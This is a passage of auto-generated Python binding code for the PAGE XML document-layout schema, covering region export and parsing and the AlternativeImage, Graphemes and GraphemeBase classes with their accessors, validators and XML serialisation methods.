AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
if self.Coords is not None:
namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
if self.Roles is not None:
namespaceprefix_ = self.Roles_nsprefix_ + ':' if (UseCapturedNS_ and self.Roles_nsprefix_) else ''
self.Roles.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Roles', pretty_print=pretty_print)
for TextRegion_ in self.TextRegion:
namespaceprefix_ = self.TextRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.TextRegion_nsprefix_) else ''
TextRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextRegion', pretty_print=pretty_print)
for ImageRegion_ in self.ImageRegion:
namespaceprefix_ = self.ImageRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ImageRegion_nsprefix_) else ''
ImageRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ImageRegion', pretty_print=pretty_print)
for LineDrawingRegion_ in self.LineDrawingRegion:
namespaceprefix_ = self.LineDrawingRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.LineDrawingRegion_nsprefix_) else ''
LineDrawingRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='LineDrawingRegion', pretty_print=pretty_print)
for GraphicRegion_ in self.GraphicRegion:
namespaceprefix_ = self.GraphicRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.GraphicRegion_nsprefix_) else ''
GraphicRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='GraphicRegion', pretty_print=pretty_print)
for TableRegion_ in self.TableRegion:
namespaceprefix_ = self.TableRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.TableRegion_nsprefix_) else ''
TableRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TableRegion', pretty_print=pretty_print)
for ChartRegion_ in self.ChartRegion:
namespaceprefix_ = self.ChartRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ChartRegion_nsprefix_) else ''
ChartRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ChartRegion', pretty_print=pretty_print)
for SeparatorRegion_ in self.SeparatorRegion:
namespaceprefix_ = self.SeparatorRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.SeparatorRegion_nsprefix_) else ''
SeparatorRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='SeparatorRegion', pretty_print=pretty_print)
for MathsRegion_ in self.MathsRegion:
namespaceprefix_ = self.MathsRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MathsRegion_nsprefix_) else ''
MathsRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MathsRegion', pretty_print=pretty_print)
for ChemRegion_ in self.ChemRegion:
namespaceprefix_ = self.ChemRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ChemRegion_nsprefix_) else ''
ChemRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ChemRegion', pretty_print=pretty_print)
for MusicRegion_ in self.MusicRegion:
namespaceprefix_ = self.MusicRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MusicRegion_nsprefix_) else ''
MusicRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MusicRegion', pretty_print=pretty_print)
for AdvertRegion_ in self.AdvertRegion:
namespaceprefix_ = self.AdvertRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.AdvertRegion_nsprefix_) else ''
AdvertRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AdvertRegion', pretty_print=pretty_print)
for NoiseRegion_ in self.NoiseRegion:
namespaceprefix_ = self.NoiseRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.NoiseRegion_nsprefix_) else ''
NoiseRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='NoiseRegion', pretty_print=pretty_print)
for UnknownRegion_ in self.UnknownRegion:
namespaceprefix_ = self.UnknownRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.UnknownRegion_nsprefix_) else ''
UnknownRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnknownRegion', pretty_print=pretty_print)
for CustomRegion_ in self.CustomRegion:
namespaceprefix_ = self.CustomRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.CustomRegion_nsprefix_) else ''
CustomRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='CustomRegion', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
value = find_attr_value_('continuation', node)
if value is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
if value in ('true', '1'):
self.continuation = True
elif value in ('false', '0'):
self.continuation = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'AlternativeImage':
obj_ = AlternativeImageType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AlternativeImage.append(obj_)
obj_.original_tagname_ = 'AlternativeImage'
elif nodeName_ == 'Coords':
obj_ = CoordsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Coords = obj_
obj_.original_tagname_ = 'Coords'
elif nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
elif nodeName_ == 'Roles':
obj_ = RolesType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Roles = obj_
obj_.original_tagname_ = 'Roles'
elif nodeName_ == 'TextRegion':
obj_ = TextRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextRegion.append(obj_)
obj_.original_tagname_ = 'TextRegion'
elif nodeName_ == 'ImageRegion':
obj_ = ImageRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ImageRegion.append(obj_)
obj_.original_tagname_ = 'ImageRegion'
elif nodeName_ == 'LineDrawingRegion':
obj_ = LineDrawingRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.LineDrawingRegion.append(obj_)
obj_.original_tagname_ = 'LineDrawingRegion'
elif nodeName_ == 'GraphicRegion':
obj_ = GraphicRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.GraphicRegion.append(obj_)
obj_.original_tagname_ = 'GraphicRegion'
elif nodeName_ == 'TableRegion':
obj_ = TableRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TableRegion.append(obj_)
obj_.original_tagname_ = 'TableRegion'
elif nodeName_ == 'ChartRegion':
obj_ = ChartRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ChartRegion.append(obj_)
obj_.original_tagname_ = 'ChartRegion'
elif nodeName_ == 'SeparatorRegion':
obj_ = SeparatorRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.SeparatorRegion.append(obj_)
obj_.original_tagname_ = 'SeparatorRegion'
elif nodeName_ == 'MathsRegion':
obj_ = MathsRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MathsRegion.append(obj_)
obj_.original_tagname_ = 'MathsRegion'
elif nodeName_ == 'ChemRegion':
obj_ = ChemRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ChemRegion.append(obj_)
obj_.original_tagname_ = 'ChemRegion'
elif nodeName_ == 'MusicRegion':
obj_ = MusicRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MusicRegion.append(obj_)
obj_.original_tagname_ = 'MusicRegion'
elif nodeName_ == 'AdvertRegion':
obj_ = AdvertRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AdvertRegion.append(obj_)
obj_.original_tagname_ = 'AdvertRegion'
elif nodeName_ == 'NoiseRegion':
obj_ = NoiseRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.NoiseRegion.append(obj_)
obj_.original_tagname_ = 'NoiseRegion'
elif nodeName_ == 'UnknownRegion':
obj_ = UnknownRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnknownRegion.append(obj_)
obj_.original_tagname_ = 'UnknownRegion'
elif nodeName_ == 'CustomRegion':
obj_ = CustomRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.CustomRegion.append(obj_)
obj_.original_tagname_ = 'CustomRegion'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class RegionType
class AlternativeImageType(GeneratedsSuper):
"""Confidence value (between 0 and 1)"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('filename', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = None
def __init__(self, filename=None, comments=None, conf=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.filename = _cast(None, filename)
self.filename_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
self.conf = _cast(float, conf)
self.conf_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, AlternativeImageType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if AlternativeImageType.subclass:
return AlternativeImageType.subclass(*args_, **kwargs_)
else:
return AlternativeImageType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_filename(self):
return self.filename
def set_filename(self, filename):
self.filename = filename
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def get_conf(self):
return self.conf
def set_conf(self, conf):
self.conf = conf
def validate_ConfSimpleType(self, value):
# Validate type pc:ConfSimpleType, a restriction on float.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, float):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
return False
if value < 0:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
if value > 1:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='AlternativeImageType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('AlternativeImageType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'AlternativeImageType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='AlternativeImageType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='AlternativeImageType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='AlternativeImageType'):
if self.filename is not None and 'filename' not in already_processed:
already_processed.add('filename')
outfile.write(' filename=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.filename), input_name='filename')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
if self.conf is not None and 'conf' not in already_processed:
already_processed.add('conf')
outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='AlternativeImageType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('filename', node)
if value is not None and 'filename' not in already_processed:
already_processed.add('filename')
self.filename = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
value = find_attr_value_('conf', node)
if value is not None and 'conf' not in already_processed:
already_processed.add('conf')
value = self.gds_parse_float(value, node, 'conf')
self.conf = value
self.validate_ConfSimpleType(self.conf) # validate type ConfSimpleType
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class AlternativeImageType
class GraphemesType(GeneratedsSuper):
"""Container for graphemes, grapheme groups and
non-printing characters."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('Grapheme', 'GraphemeType', 1, 0, {'name': 'Grapheme', 'type': 'GraphemeType'}, 8),
MemberSpec_('NonPrintingChar', 'NonPrintingCharType', 1, 0, {'name': 'NonPrintingChar', 'type': 'NonPrintingCharType'}, 8),
MemberSpec_('GraphemeGroup', 'GraphemeGroupType', 1, 0, {'name': 'GraphemeGroup', 'type': 'GraphemeGroupType'}, 8),
]
subclass = None
superclass = None
def __init__(self, Grapheme=None, NonPrintingChar=None, GraphemeGroup=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
if Grapheme is None:
self.Grapheme = []
else:
self.Grapheme = Grapheme
self.Grapheme_nsprefix_ = "pc"
if NonPrintingChar is None:
self.NonPrintingChar = []
else:
self.NonPrintingChar = NonPrintingChar
self.NonPrintingChar_nsprefix_ = "pc"
if GraphemeGroup is None:
self.GraphemeGroup = []
else:
self.GraphemeGroup = GraphemeGroup
self.GraphemeGroup_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, GraphemesType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if GraphemesType.subclass:
return GraphemesType.subclass(*args_, **kwargs_)
else:
return GraphemesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Grapheme(self):
return self.Grapheme
def set_Grapheme(self, Grapheme):
self.Grapheme = Grapheme
def add_Grapheme(self, value):
self.Grapheme.append(value)
def insert_Grapheme_at(self, index, value):
self.Grapheme.insert(index, value)
def replace_Grapheme_at(self, index, value):
self.Grapheme[index] = value
def get_NonPrintingChar(self):
return self.NonPrintingChar
def set_NonPrintingChar(self, NonPrintingChar):
self.NonPrintingChar = NonPrintingChar
def add_NonPrintingChar(self, value):
self.NonPrintingChar.append(value)
def insert_NonPrintingChar_at(self, index, value):
self.NonPrintingChar.insert(index, value)
def replace_NonPrintingChar_at(self, index, value):
self.NonPrintingChar[index] = value
def get_GraphemeGroup(self):
return self.GraphemeGroup
def set_GraphemeGroup(self, GraphemeGroup):
self.GraphemeGroup = GraphemeGroup
def add_GraphemeGroup(self, value):
self.GraphemeGroup.append(value)
def insert_GraphemeGroup_at(self, index, value):
self.GraphemeGroup.insert(index, value)
def replace_GraphemeGroup_at(self, index, value):
self.GraphemeGroup[index] = value
def hasContent_(self):
if (
self.Grapheme or
self.NonPrintingChar or
self.GraphemeGroup
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemesType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphemesType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'GraphemesType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemesType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphemesType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphemesType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Grapheme_ in self.Grapheme:
namespaceprefix_ = self.Grapheme_nsprefix_ + ':' if (UseCapturedNS_ and self.Grapheme_nsprefix_) else ''
Grapheme_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Grapheme', pretty_print=pretty_print)
for NonPrintingChar_ in self.NonPrintingChar:
namespaceprefix_ = self.NonPrintingChar_nsprefix_ + ':' if (UseCapturedNS_ and self.NonPrintingChar_nsprefix_) else ''
NonPrintingChar_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='NonPrintingChar', pretty_print=pretty_print)
for GraphemeGroup_ in self.GraphemeGroup:
namespaceprefix_ = self.GraphemeGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.GraphemeGroup_nsprefix_) else ''
GraphemeGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='GraphemeGroup', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Grapheme':
obj_ = GraphemeType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Grapheme.append(obj_)
obj_.original_tagname_ = 'Grapheme'
elif nodeName_ == 'NonPrintingChar':
obj_ = NonPrintingCharType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.NonPrintingChar.append(obj_)
obj_.original_tagname_ = 'NonPrintingChar'
elif nodeName_ == 'GraphemeGroup':
obj_ = GraphemeGroupType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.GraphemeGroup.append(obj_)
obj_.original_tagname_ = 'GraphemeGroup'
# end class GraphemesType
class GraphemeBaseType(GeneratedsSuper):
"""Base type for graphemes, grapheme groups and non-printing characters.
Order index of grapheme, group, or non-printing character
within the parent container (graphemes or glyph or grapheme group).
Type of character represented by the
grapheme, group, or non-printing character element.
For generic useFor generic use"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('index', 'indexType2', 0, 0, {'use': 'required'}),
MemberSpec_('ligature', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('charType', 'charTypeType', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
]
subclass = None
superclass = None
def __init__(self, id=None, index=None, ligature=None, charType=None, custom=None, comments=None, TextEquiv=None, extensiontype_=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.index = _cast(int, index)
self.index_nsprefix_ = None
self.ligature = _cast(bool, ligature)
self.ligature_nsprefix_ = None
self.charType = _cast(None, charType)
self.charType_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
if TextEquiv is None:
self.TextEquiv = []
else:
self.TextEquiv = TextEquiv
self.TextEquiv_nsprefix_ = "pc"
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, GraphemeBaseType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if GraphemeBaseType.subclass:
return GraphemeBaseType.subclass(*args_, **kwargs_)
else:
return GraphemeBaseType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_TextEquiv(self):
return self.TextEquiv
def set_TextEquiv(self, TextEquiv):
self.TextEquiv = TextEquiv
def add_TextEquiv(self, value):
self.TextEquiv.append(value)
def insert_TextEquiv_at(self, index, value):
self.TextEquiv.insert(index, value)
def replace_TextEquiv_at(self, index, value):
self.TextEquiv[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_index(self):
return self.index
def set_index(self, index):
self.index = index
def get_ligature(self):
return self.ligature
def set_ligature(self, ligature):
self.ligature = ligature
def get_charType(self):
return self.charType
def set_charType(self, charType):
self.charType = charType
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def validate_indexType2(self, value):
# Validate type indexType2, a restriction on int.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, int):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (int)' % {"value": value, "lineno": lineno, })
return False
if value < 0:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on indexType2' % {"value": value, "lineno": lineno} )
result = False
def validate_charTypeType(self, value):
# Validate type charTypeType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['base', 'combining']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on charTypeType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.TextEquiv
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeBaseType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphemeBaseType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'GraphemeBaseType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeBaseType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphemeBaseType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphemeBaseType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
if self.ligature is not None and 'ligature' not in already_processed:
already_processed.add('ligature')
outfile.write(' ligature="%s"' % self.gds_format_boolean(self.ligature, input_name='ligature'))
if self.charType is not None and 'charType' not in already_processed:
already_processed.add('charType')
outfile.write(' charType=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.charType), input_name='charType')), ))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
if ":" not in self.extensiontype_:
imported_ns_type_prefix_ = GenerateDSNamespaceTypePrefixes_.get(self.extensiontype_, '')
outfile.write(' xsi:type="%s%s"' % (imported_ns_type_prefix_, self.extensiontype_))
else:
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeBaseType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for TextEquiv_ in self.TextEquiv:
namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
